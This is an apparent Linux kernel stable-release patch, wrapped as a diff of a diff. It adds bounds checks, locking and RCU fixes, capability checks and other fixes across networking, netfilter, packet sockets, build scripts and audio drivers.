+diff --git a/net/core/filter.c b/net/core/filter.c
+index adc327f4af1e9..3a6110ea4009f 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -2582,6 +2582,22 @@ BPF_CALL_2(bpf_msg_cork_bytes, struct sk_msg *, msg, u32, bytes)
+ 	return 0;
+ }
+ 
++static void sk_msg_reset_curr(struct sk_msg *msg)
++{
++	u32 i = msg->sg.start;
++	u32 len = 0;
++
++	do {
++		len += sk_msg_elem(msg, i)->length;
++		sk_msg_iter_var_next(i);
++		if (len >= msg->sg.size)
++			break;
++	} while (i != msg->sg.end);
++
++	msg->sg.curr = i;
++	msg->sg.copybreak = 0;
++}
++
+ static const struct bpf_func_proto bpf_msg_cork_bytes_proto = {
+ 	.func           = bpf_msg_cork_bytes,
+ 	.gpl_only       = false,
+@@ -2701,6 +2717,7 @@ BPF_CALL_4(bpf_msg_pull_data, struct sk_msg *, msg, u32, start,
+ 		      msg->sg.end - shift + NR_MSG_FRAG_IDS :
+ 		      msg->sg.end - shift;
+ out:
++	sk_msg_reset_curr(msg);
+ 	msg->data = sg_virt(&msg->sg.data[first_sge]) + start - offset;
+ 	msg->data_end = msg->data + bytes;
+ 	return 0;
+@@ -2837,6 +2854,7 @@ BPF_CALL_4(bpf_msg_push_data, struct sk_msg *, msg, u32, start,
+ 		msg->sg.data[new] = rsge;
+ 	}
+ 
++	sk_msg_reset_curr(msg);
+ 	sk_msg_compute_data_pointers(msg);
+ 	return 0;
+ }
+@@ -3005,6 +3023,7 @@ BPF_CALL_4(bpf_msg_pop_data, struct sk_msg *, msg, u32, start,
+ 
+ 	sk_mem_uncharge(msg->sk, len - pop);
+ 	msg->sg.size -= (len - pop);
++	sk_msg_reset_curr(msg);
+ 	sk_msg_compute_data_pointers(msg);
+ 	return 0;
+ }
+diff --git a/net/core/scm.c b/net/core/scm.c
+index acb7d776fa6ec..e762a4b8a1d22 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -26,6 +26,7 @@
+ #include <linux/nsproxy.h>
+ #include <linux/slab.h>
+ #include <linux/errqueue.h>
++#include <linux/io_uring.h>
+ 
+ #include <linux/uaccess.h>
+ 
+@@ -103,6 +104,11 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
+ 
+ 		if (fd < 0 || !(file = fget_raw(fd)))
+ 			return -EBADF;
++		/* don't allow io_uring files */
++		if (io_uring_get_socket(file)) {
++			fput(file);
++			return -EINVAL;
++		}
+ 		*fpp++ = file;
+ 		fpl->count++;
+ 	}
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index 5b8242265617d..d67d026d7f975 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -634,15 +634,18 @@ static netdev_tx_t ipgre_xmit(struct sk_buff *skb,
+ 	}
+ 
+ 	if (dev->header_ops) {
++		int pull_len = tunnel->hlen + sizeof(struct iphdr);
++
+ 		if (skb_cow_head(skb, 0))
+ 			goto free_skb;
+ 
+ 		tnl_params = (const struct iphdr *)skb->data;
+ 
+-		/* Pull skb since ip_tunnel_xmit() needs skb->data pointing
+-		 * to gre header.
+-		 */
+-		skb_pull(skb, tunnel->hlen + sizeof(struct iphdr));
++		if (!pskb_network_may_pull(skb, pull_len))
++			goto free_skb;
++
++		/* ip_tunnel_xmit() needs skb->data pointing to gre header. */
++		skb_pull(skb, pull_len);
+ 		skb_reset_mac_header(skb);
+ 
+ 		if (skb->ip_summed == CHECKSUM_PARTIAL &&
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 288678f17ccaf..58409ea2da0af 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3473,9 +3473,25 @@ int tcp_set_window_clamp(struct sock *sk, int val)
+ 			return -EINVAL;
+ 		tp->window_clamp = 0;
+ 	} else {
+-		tp->window_clamp = val < SOCK_MIN_RCVBUF / 2 ?
+-			SOCK_MIN_RCVBUF / 2 : val;
+-		tp->rcv_ssthresh = min(tp->rcv_wnd, tp->window_clamp);
++		u32 new_rcv_ssthresh, old_window_clamp = tp->window_clamp;
++		u32 new_window_clamp = val < SOCK_MIN_RCVBUF / 2 ?
++						SOCK_MIN_RCVBUF / 2 : val;
++
++		if (new_window_clamp == old_window_clamp)
++			return 0;
++
++		tp->window_clamp = new_window_clamp;
++		if (new_window_clamp < old_window_clamp) {
++			/* need to apply the reserved mem provisioning only
++			 * when shrinking the window clamp
++			 */
++			__tcp_adjust_rcv_ssthresh(sk, tp->window_clamp);
++
++		} else {
++			new_rcv_ssthresh = min(tp->rcv_wnd, tp->window_clamp);
++			tp->rcv_ssthresh = max(new_rcv_ssthresh,
++					       tp->rcv_ssthresh);
++		}
+ 	}
+ 	return 0;
+ }
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 65dae3d43684f..34460c9b37ae2 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3803,8 +3803,12 @@ static int tcp_ack(struct sock *sk, const struct sk_buff *skb, int flag)
+ 	 * then we can probably ignore it.
+ 	 */
+ 	if (before(ack, prior_snd_una)) {
++		u32 max_window;
++
++		/* do not accept ACK for bytes we never sent. */
++		max_window = min_t(u64, tp->max_window, tp->bytes_acked);
+ 		/* RFC 5961 5.2 [Blind Data Injection Attack].[Mitigation] */
+-		if (before(ack, prior_snd_una - tp->max_window)) {
++		if (before(ack, prior_snd_una - max_window)) {
+ 			if (!(flag & FLAG_NO_CHALLENGE_ACK))
+ 				tcp_send_challenge_ack(sk);
+ 			return -SKB_DROP_REASON_TCP_TOO_OLD_ACK;
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index eb6640f9a7921..1840735e9cb07 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -1502,13 +1502,9 @@ out:
+ 			if (!pn_leaf && !(pn->fn_flags & RTN_RTINFO)) {
+ 				pn_leaf = fib6_find_prefix(info->nl_net, table,
+ 							   pn);
+-#if RT6_DEBUG >= 2
+-				if (!pn_leaf) {
+-					WARN_ON(!pn_leaf);
++				if (!pn_leaf)
+ 					pn_leaf =
+ 					    info->nl_net->ipv6.fib6_null_entry;
+-				}
+-#endif
+ 				fib6_info_hold(pn_leaf);
+ 				rcu_assign_pointer(pn->leaf, pn_leaf);
+ 			}
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 20eede37d5228..d47dfdcb899b0 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -61,6 +61,8 @@ MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_IPSET);
+ 	ip_set_dereference((inst)->ip_set_list)[id]
+ #define ip_set_ref_netlink(inst,id)	\
+ 	rcu_dereference_raw((inst)->ip_set_list)[id]
++#define ip_set_dereference_nfnl(p)	\
++	rcu_dereference_check(p, lockdep_nfnl_is_held(NFNL_SUBSYS_IPSET))
+ 
+ /* The set types are implemented in modules and registered set types
+  * can be found in ip_set_type_list. Adding/deleting types is
+@@ -708,15 +710,10 @@ __ip_set_put_netlink(struct ip_set *set)
+ static struct ip_set *
+ ip_set_rcu_get(struct net *net, ip_set_id_t index)
+ {
+-	struct ip_set *set;
+ 	struct ip_set_net *inst = ip_set_pernet(net);
+ 
+-	rcu_read_lock();
+-	/* ip_set_list itself needs to be protected */
+-	set = rcu_dereference(inst->ip_set_list)[index];
+-	rcu_read_unlock();
+-
+-	return set;
++	/* ip_set_list and the set pointer need to be protected */
++	return ip_set_dereference_nfnl(inst->ip_set_list)[index];
+ }
+ 
+ static inline void
+@@ -1399,6 +1396,9 @@ static int ip_set_swap(struct sk_buff *skb, const struct nfnl_info *info,
+ 	ip_set(inst, to_id) = from;
+ 	write_unlock_bh(&ip_set_ref_lock);
+ 
++	/* Make sure all readers of the old set pointers are completed. */
++	synchronize_rcu();
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 421211eba838b..05fa5141af516 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -805,7 +805,7 @@ static struct nft_table *nft_table_lookup(const struct net *net,
+ 
+ static struct nft_table *nft_table_lookup_byhandle(const struct net *net,
+ 						   const struct nlattr *nla,
+-						   u8 genmask, u32 nlpid)
++						   int family, u8 genmask, u32 nlpid)
+ {
+ 	struct nftables_pernet *nft_net;
+ 	struct nft_table *table;
+@@ -813,6 +813,7 @@ static struct nft_table *nft_table_lookup_byhandle(const struct net *net,
+ 	nft_net = nft_pernet(net);
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+ 		if (be64_to_cpu(nla_get_be64(nla)) == table->handle &&
++		    table->family == family &&
+ 		    nft_active_genmask(table, genmask)) {
+ 			if (nft_table_has_owner(table) &&
+ 			    nlpid && table->nlpid != nlpid)
+@@ -1537,7 +1538,7 @@ static int nf_tables_deltable(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	if (nla[NFTA_TABLE_HANDLE]) {
+ 		attr = nla[NFTA_TABLE_HANDLE];
+-		table = nft_table_lookup_byhandle(net, attr, genmask,
++		table = nft_table_lookup_byhandle(net, attr, family, genmask,
+ 						  NETLINK_CB(skb).portid);
+ 	} else {
+ 		attr = nla[NFTA_TABLE_NAME];
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index cf9a1ae87d9b1..a470e5f612843 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -279,10 +279,15 @@ static int nft_dynset_init(const struct nft_ctx *ctx,
+ 			priv->expr_array[i] = dynset_expr;
+ 			priv->num_exprs++;
+ 
+-			if (set->num_exprs &&
+-			    dynset_expr->ops != set->exprs[i]->ops) {
+-				err = -EOPNOTSUPP;
+-				goto err_expr_free;
++			if (set->num_exprs) {
++				if (i >= set->num_exprs) {
++					err = -EINVAL;
++					goto err_expr_free;
++				}
++				if (dynset_expr->ops != set->exprs[i]->ops) {
++					err = -EOPNOTSUPP;
++					goto err_expr_free;
++				}
+ 			}
+ 			i++;
+ 		}
+diff --git a/net/netfilter/nft_exthdr.c b/net/netfilter/nft_exthdr.c
+index efb50c2b41f32..de588f7b69c45 100644
+--- a/net/netfilter/nft_exthdr.c
++++ b/net/netfilter/nft_exthdr.c
+@@ -10,6 +10,7 @@
+ #include <linux/netlink.h>
+ #include <linux/netfilter.h>
+ #include <linux/netfilter/nf_tables.h>
++#include <linux/dccp.h>
+ #include <linux/sctp.h>
+ #include <net/netfilter/nf_tables_core.h>
+ #include <net/netfilter/nf_tables.h>
+@@ -214,7 +215,7 @@ static void nft_exthdr_tcp_eval(const struct nft_expr *expr,
+ 
+ 		offset = i + priv->offset;
+ 		if (priv->flags & NFT_EXTHDR_F_PRESENT) {
+-			*dest = 1;
++			nft_reg_store8(dest, 1);
+ 		} else {
+ 			if (priv->len % NFT_REG32_SIZE)
+ 				dest[priv->len / NFT_REG32_SIZE] = 0;
+@@ -409,6 +410,82 @@ err:
+ 		regs->verdict.code = NFT_BREAK;
+ }
+ 
++static void nft_exthdr_dccp_eval(const struct nft_expr *expr,
++				 struct nft_regs *regs,
++				 const struct nft_pktinfo *pkt)
++{
++	struct nft_exthdr *priv = nft_expr_priv(expr);
++	unsigned int thoff, dataoff, optoff, optlen, i;
++	u32 *dest = &regs->data[priv->dreg];
++	const struct dccp_hdr *dh;
++	struct dccp_hdr _dh;
++
++	if (pkt->tprot != IPPROTO_DCCP || pkt->fragoff)
++		goto err;
++
++	thoff = nft_thoff(pkt);
++
++	dh = skb_header_pointer(pkt->skb, thoff, sizeof(_dh), &_dh);
++	if (!dh)
++		goto err;
++
++	dataoff = dh->dccph_doff * sizeof(u32);
++	optoff = __dccp_hdr_len(dh);
++	if (dataoff <= optoff)
++		goto err;
++
++	optlen = dataoff - optoff;
++
++	for (i = 0; i < optlen; ) {
++		/* Options 0 (DCCPO_PADDING) - 31 (DCCPO_MAX_RESERVED) are 1B in
++		 * the length; the remaining options are at least 2B long.  In
++		 * all cases, the first byte contains the option type.  In
++		 * multi-byte options, the second byte contains the option
++		 * length, which must be at least two: 1 for the type plus 1 for
++		 * the length plus 0-253 for any following option data.  We
++		 * aren't interested in the option data, only the type and the
++		 * length, so we don't need to read more than two bytes at a
++		 * time.
++		 */
++		unsigned int buflen = optlen - i;
++		u8 buf[2], *bufp;
++		u8 type, len;
++
++		if (buflen > sizeof(buf))
++			buflen = sizeof(buf);
++
++		bufp = skb_header_pointer(pkt->skb, thoff + optoff + i, buflen,
++					  &buf);
++		if (!bufp)
++			goto err;
++
++		type = bufp[0];
++
++		if (type == priv->type) {
++			nft_reg_store8(dest, 1);
++			return;
++		}
++
++		if (type <= DCCPO_MAX_RESERVED) {
++			i++;
++			continue;
++		}
++
++		if (buflen < 2)
++			goto err;
++
++		len = bufp[1];
++
++		if (len < 2)
++			goto err;
++
++		i += len;
++	}
++
++err:
++	*dest = 0;
++}
++
+ static const struct nla_policy nft_exthdr_policy[NFTA_EXTHDR_MAX + 1] = {
+ 	[NFTA_EXTHDR_DREG]		= { .type = NLA_U32 },
+ 	[NFTA_EXTHDR_TYPE]		= { .type = NLA_U8 },
+@@ -560,6 +637,22 @@ static int nft_exthdr_ipv4_init(const struct nft_ctx *ctx,
+ 	return 0;
+ }
+ 
++static int nft_exthdr_dccp_init(const struct nft_ctx *ctx,
++				const struct nft_expr *expr,
++				const struct nlattr * const tb[])
++{
++	struct nft_exthdr *priv = nft_expr_priv(expr);
++	int err = nft_exthdr_init(ctx, expr, tb);
++
++	if (err < 0)
++		return err;
++
++	if (!(priv->flags & NFT_EXTHDR_F_PRESENT))
++		return -EOPNOTSUPP;
++
++	return 0;
++}
++
+ static int nft_exthdr_dump_common(struct sk_buff *skb, const struct nft_exthdr *priv)
+ {
+ 	if (nla_put_u8(skb, NFTA_EXTHDR_TYPE, priv->type))
+@@ -686,6 +779,15 @@ static const struct nft_expr_ops nft_exthdr_sctp_ops = {
+ 	.reduce		= nft_exthdr_reduce,
+ };
+ 
++static const struct nft_expr_ops nft_exthdr_dccp_ops = {
++	.type		= &nft_exthdr_type,
++	.size		= NFT_EXPR_SIZE(sizeof(struct nft_exthdr)),
++	.eval		= nft_exthdr_dccp_eval,
++	.init		= nft_exthdr_dccp_init,
++	.dump		= nft_exthdr_dump,
++	.reduce		= nft_exthdr_reduce,
++};
++
+ static const struct nft_expr_ops *
+ nft_exthdr_select_ops(const struct nft_ctx *ctx,
+ 		      const struct nlattr * const tb[])
+@@ -720,6 +822,10 @@ nft_exthdr_select_ops(const struct nft_ctx *ctx,
+ 		if (tb[NFTA_EXTHDR_DREG])
+ 			return &nft_exthdr_sctp_ops;
+ 		break;
++	case NFT_EXTHDR_OP_DCCP:
++		if (tb[NFTA_EXTHDR_DREG])
++			return &nft_exthdr_dccp_ops;
++		break;
+ 	}
+ 
+ 	return ERR_PTR(-EOPNOTSUPP);
+diff --git a/net/netfilter/nft_fib.c b/net/netfilter/nft_fib.c
+index 1f12d7ade606c..5748415f74d0b 100644
+--- a/net/netfilter/nft_fib.c
++++ b/net/netfilter/nft_fib.c
+@@ -144,11 +144,15 @@ void nft_fib_store_result(void *reg, const struct nft_fib *priv,
+ 	switch (priv->result) {
+ 	case NFT_FIB_RESULT_OIF:
+ 		index = dev ? dev->ifindex : 0;
+-		*dreg = (priv->flags & NFTA_FIB_F_PRESENT) ? !!index : index;
++		if (priv->flags & NFTA_FIB_F_PRESENT)
++			nft_reg_store8(dreg, !!index);
++		else
++			*dreg = index;
++
+ 		break;
+ 	case NFT_FIB_RESULT_OIFNAME:
+ 		if (priv->flags & NFTA_FIB_F_PRESENT)
+-			*dreg = !!dev;
++			nft_reg_store8(dreg, !!dev);
+ 		else
+ 			strncpy(reg, dev ? dev->name : "", IFNAMSIZ);
+ 		break;
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index deea6196d9925..4e1cc31729b80 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -2042,6 +2042,9 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 		e = f->mt[r].e;
+ 
++		if (!nft_set_elem_active(&e->ext, iter->genmask))
++			goto cont;
++
+ 		elem.priv = e;
+ 
+ 		iter->err = iter->fn(ctx, set, iter, &elem);
+diff --git a/net/netfilter/xt_owner.c b/net/netfilter/xt_owner.c
+index e85ce69924aee..50332888c8d23 100644
+--- a/net/netfilter/xt_owner.c
++++ b/net/netfilter/xt_owner.c
+@@ -76,18 +76,23 @@ owner_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 		 */
+ 		return false;
+ 
+-	filp = sk->sk_socket->file;
+-	if (filp == NULL)
++	read_lock_bh(&sk->sk_callback_lock);
++	filp = sk->sk_socket ? sk->sk_socket->file : NULL;
++	if (filp == NULL) {
++		read_unlock_bh(&sk->sk_callback_lock);
+ 		return ((info->match ^ info->invert) &
+ 		       (XT_OWNER_UID | XT_OWNER_GID)) == 0;
++	}
+ 
+ 	if (info->match & XT_OWNER_UID) {
+ 		kuid_t uid_min = make_kuid(net->user_ns, info->uid_min);
+ 		kuid_t uid_max = make_kuid(net->user_ns, info->uid_max);
+ 		if ((uid_gte(filp->f_cred->fsuid, uid_min) &&
+ 		     uid_lte(filp->f_cred->fsuid, uid_max)) ^
+-		    !(info->invert & XT_OWNER_UID))
++		    !(info->invert & XT_OWNER_UID)) {
++			read_unlock_bh(&sk->sk_callback_lock);
+ 			return false;
++		}
+ 	}
+ 
+ 	if (info->match & XT_OWNER_GID) {
+@@ -112,10 +117,13 @@ owner_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 			}
+ 		}
+ 
+-		if (match ^ !(info->invert & XT_OWNER_GID))
++		if (match ^ !(info->invert & XT_OWNER_GID)) {
++			read_unlock_bh(&sk->sk_callback_lock);
+ 			return false;
++		}
+ 	}
+ 
++	read_unlock_bh(&sk->sk_callback_lock);
+ 	return true;
+ }
+ 
+diff --git a/net/netlink/genetlink.c b/net/netlink/genetlink.c
+index 3e16527beb914..505d3b910cc29 100644
+--- a/net/netlink/genetlink.c
++++ b/net/netlink/genetlink.c
+@@ -1438,6 +1438,9 @@ static int genl_bind(struct net *net, int group)
+ 		if ((grp->flags & GENL_UNS_ADMIN_PERM) &&
+ 		    !ns_capable(net->user_ns, CAP_NET_ADMIN))
+ 			ret = -EPERM;
++		if (grp->cap_sys_admin &&
++		    !ns_capable(net->user_ns, CAP_SYS_ADMIN))
++			ret = -EPERM;
+ 
+ 		break;
+ 	}
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 451bd8bfafd23..51882f07ef70c 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -4275,7 +4275,7 @@ static void packet_mm_open(struct vm_area_struct *vma)
+ 	struct sock *sk = sock->sk;
+ 
+ 	if (sk)
+-		atomic_inc(&pkt_sk(sk)->mapped);
++		atomic_long_inc(&pkt_sk(sk)->mapped);
+ }
+ 
+ static void packet_mm_close(struct vm_area_struct *vma)
+@@ -4285,7 +4285,7 @@ static void packet_mm_close(struct vm_area_struct *vma)
+ 	struct sock *sk = sock->sk;
+ 
+ 	if (sk)
+-		atomic_dec(&pkt_sk(sk)->mapped);
++		atomic_long_dec(&pkt_sk(sk)->mapped);
+ }
+ 
+ static const struct vm_operations_struct packet_mmap_ops = {
+@@ -4380,7 +4380,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
+ 
+ 	err = -EBUSY;
+ 	if (!closing) {
+-		if (atomic_read(&po->mapped))
++		if (atomic_long_read(&po->mapped))
+ 			goto out;
+ 		if (packet_read_pending(rb))
+ 			goto out;
+@@ -4483,7 +4483,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
+ 
+ 	err = -EBUSY;
+ 	mutex_lock(&po->pg_vec_lock);
+-	if (closing || atomic_read(&po->mapped) == 0) {
++	if (closing || atomic_long_read(&po->mapped) == 0) {
+ 		err = 0;
+ 		spin_lock_bh(&rb_queue->lock);
+ 		swap(rb->pg_vec, pg_vec);
+@@ -4501,9 +4501,9 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
+ 		po->prot_hook.func = (po->rx_ring.pg_vec) ?
+ 						tpacket_rcv : packet_rcv;
+ 		skb_queue_purge(rb_queue);
+-		if (atomic_read(&po->mapped))
+-			pr_err("packet_mmap: vma is busy: %d\n",
+-			       atomic_read(&po->mapped));
++		if (atomic_long_read(&po->mapped))
++			pr_err("packet_mmap: vma is busy: %ld\n",
++			       atomic_long_read(&po->mapped));
+ 	}
+ 	mutex_unlock(&po->pg_vec_lock);
+ 
+@@ -4581,7 +4581,7 @@ static int packet_mmap(struct file *file, struct socket *sock,
+ 		}
+ 	}
+ 
+-	atomic_inc(&po->mapped);
++	atomic_long_inc(&po->mapped);
+ 	vma->vm_ops = &packet_mmap_ops;
+ 	err = 0;
+ 
+diff --git a/net/packet/internal.h b/net/packet/internal.h
+index 3bae8ea7a36f5..b2edfe6fc8e77 100644
+--- a/net/packet/internal.h
++++ b/net/packet/internal.h
+@@ -126,7 +126,7 @@ struct packet_sock {
+ 	__be16			num;
+ 	struct packet_rollover	*rollover;
+ 	struct packet_mclist	*mclist;
+-	atomic_t		mapped;
++	atomic_long_t		mapped;
+ 	enum tpacket_versions	tp_version;
+ 	unsigned int		tp_hdrlen;
+ 	unsigned int		tp_reserve;
+diff --git a/net/psample/psample.c b/net/psample/psample.c
+index 81a794e36f535..c34e902855dbe 100644
+--- a/net/psample/psample.c
++++ b/net/psample/psample.c
+@@ -31,7 +31,8 @@ enum psample_nl_multicast_groups {
+ 
+ static const struct genl_multicast_group psample_nl_mcgrps[] = {
+ 	[PSAMPLE_NL_MCGRP_CONFIG] = { .name = PSAMPLE_NL_MCGRP_CONFIG_NAME },
+-	[PSAMPLE_NL_MCGRP_SAMPLE] = { .name = PSAMPLE_NL_MCGRP_SAMPLE_NAME },
++	[PSAMPLE_NL_MCGRP_SAMPLE] = { .name = PSAMPLE_NL_MCGRP_SAMPLE_NAME,
++				      .flags = GENL_UNS_ADMIN_PERM },
+ };
+ 
+ static struct genl_family psample_nl_family __ro_after_init;
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index f7592638e61d3..5c8e02d56fd43 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -722,7 +722,7 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 
+ 	rcu_read_lock();
+ 	if (xsk_check_common(xs))
+-		goto skip_tx;
++		goto out;
+ 
+ 	pool = xs->pool;
+ 
+@@ -734,12 +734,11 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 			xsk_generic_xmit(sk);
+ 	}
+ 
+-skip_tx:
+ 	if (xs->rx && !xskq_prod_is_empty(xs->rx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 	if (xs->tx && xsk_tx_writeable(xs))
+ 		mask |= EPOLLOUT | EPOLLWRNORM;
+-
++out:
+ 	rcu_read_unlock();
+ 	return mask;
+ }
+diff --git a/scripts/checkstack.pl b/scripts/checkstack.pl
+index d48dfed6d3dba..a0f9101d5fd44 100755
+--- a/scripts/checkstack.pl
++++ b/scripts/checkstack.pl
+@@ -146,15 +146,11 @@ $total_size = 0;
+ while (my $line = <STDIN>) {
+ 	if ($line =~ m/$funcre/) {
+ 		$func = $1;
+-		next if $line !~ m/^($xs*)/;
++		next if $line !~ m/^($x*)/;
+ 		if ($total_size > $min_stack) {
+ 			push @stack, "$intro$total_size\n";
+ 		}
+-
+-		$addr = $1;
+-		$addr =~ s/ /0/g;
+-		$addr = "0x$addr";
+-
++		$addr = "0x$1";
+ 		$intro = "$addr $func [$file]:";
+ 		my $padlen = 56 - length($intro);
+ 		while ($padlen > 0) {
+diff --git a/scripts/dtc/dt-extract-compatibles b/scripts/dtc/dt-extract-compatibles
+index a1119762ed086..9686a1cf85498 100755
+--- a/scripts/dtc/dt-extract-compatibles
++++ b/scripts/dtc/dt-extract-compatibles
+@@ -1,8 +1,8 @@
+ #!/usr/bin/env python3
+ # SPDX-License-Identifier: GPL-2.0-only
+ 
++import fnmatch
+ import os
+-import glob
+ import re
+ import argparse
+ 
+@@ -49,6 +49,24 @@ def print_compat(filename, compatibles):
+ 	else:
+ 		print(*compatibles, sep='\n')
+ 
++def glob_without_symlinks(root, glob):
++	for path, dirs, files in os.walk(root):
++		# Ignore hidden directories
++		for d in dirs:
++			if fnmatch.fnmatch(d, ".*"):
++				dirs.remove(d)
++		for f in files:
++			if fnmatch.fnmatch(f, glob):
++				yield os.path.join(path, f)
++
++def files_to_parse(path_args):
++	for f in path_args:
++		if os.path.isdir(f):
++			for filename in glob_without_symlinks(f, "*.c"):
++				yield filename
++		else:
++			yield f
++
+ show_filename = False
+ 
+ if __name__ == "__main__":
+@@ -59,11 +77,6 @@ if __name__ == "__main__":
+ 
+ 	show_filename = args.with_filename
+ 
+-	for f in args.cfile:
+-		if os.path.isdir(f):
+-			for filename in glob.iglob(f + "/**/*.c", recursive=True):
+-				compat_list = parse_compatibles(filename)
+-				print_compat(filename, compat_list)
+-		else:
+-			compat_list = parse_compatibles(f)
+-			print_compat(f, compat_list)
++	for f in files_to_parse(args.cfile):
++		compat_list = parse_compatibles(f)
++		print_compat(f, compat_list)
+diff --git a/scripts/kconfig/symbol.c b/scripts/kconfig/symbol.c
+index 0572330bf8a78..a76925b46ce63 100644
+--- a/scripts/kconfig/symbol.c
++++ b/scripts/kconfig/symbol.c
+@@ -122,9 +122,9 @@ static long long sym_get_range_val(struct symbol *sym, int base)
+ static void sym_validate_range(struct symbol *sym)
+ {
+ 	struct property *prop;
++	struct symbol *range_sym;
+ 	int base;
+ 	long long val, val2;
+-	char str[64];
+ 
+ 	switch (sym->type) {
+ 	case S_INT:
+@@ -140,17 +140,15 @@ static void sym_validate_range(struct symbol *sym)
+ 	if (!prop)
+ 		return;
+ 	val = strtoll(sym->curr.val, NULL, base);
+-	val2 = sym_get_range_val(prop->expr->left.sym, base);
++	range_sym = prop->expr->left.sym;
++	val2 = sym_get_range_val(range_sym, base);
+ 	if (val >= val2) {
+-		val2 = sym_get_range_val(prop->expr->right.sym, base);
++		range_sym = prop->expr->right.sym;
++		val2 = sym_get_range_val(range_sym, base);
+ 		if (val <= val2)
+ 			return;
+ 	}
+-	if (sym->type == S_INT)
+-		sprintf(str, "%lld", val2);
+-	else
+-		sprintf(str, "0x%llx", val2);
+-	sym->curr.val = xstrdup(str);
++	sym->curr.val = range_sym->curr.val;
+ }
+ 
+ static void sym_set_changed(struct symbol *sym)
+diff --git a/sound/core/pcm.c b/sound/core/pcm.c
+index 9d95e37311230..2415a3c3ac6c9 100644
+--- a/sound/core/pcm.c
++++ b/sound/core/pcm.c
+@@ -253,6 +253,7 @@ static const char * const snd_pcm_state_names[] = {
+ 	STATE(DRAINING),
+ 	STATE(PAUSED),
+ 	STATE(SUSPENDED),
++	STATE(DISCONNECTED),
+ };
+ 
+ static const char * const snd_pcm_access_names[] = {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d1944c83b03a2..c6cae3369a6a1 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10031,6 +10031,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+ 	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0xf111, 0x0005, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0xf111, 0x0006, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+ 	/* Below is a quirk table taken from the old code.
+@@ -11952,6 +11954,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x32f7, "Lenovo ThinkCentre M90", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3321, "Lenovo ThinkCentre M70 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x331b, "Lenovo ThinkCentre M90 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x3364, "Lenovo ThinkCentre M90 Gen5", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3742, "Lenovo TianYi510Pro-14IOB", ALC897_FIXUP_HEADSET_MIC_PIN2),
+ 	SND_PCI_QUIRK(0x17aa, 0x38af, "Lenovo Ideapad Y550P", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Ideapad Y550", ALC662_FIXUP_IDEAPAD),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index c494de5f5c066..1dde1f3196acc 100644
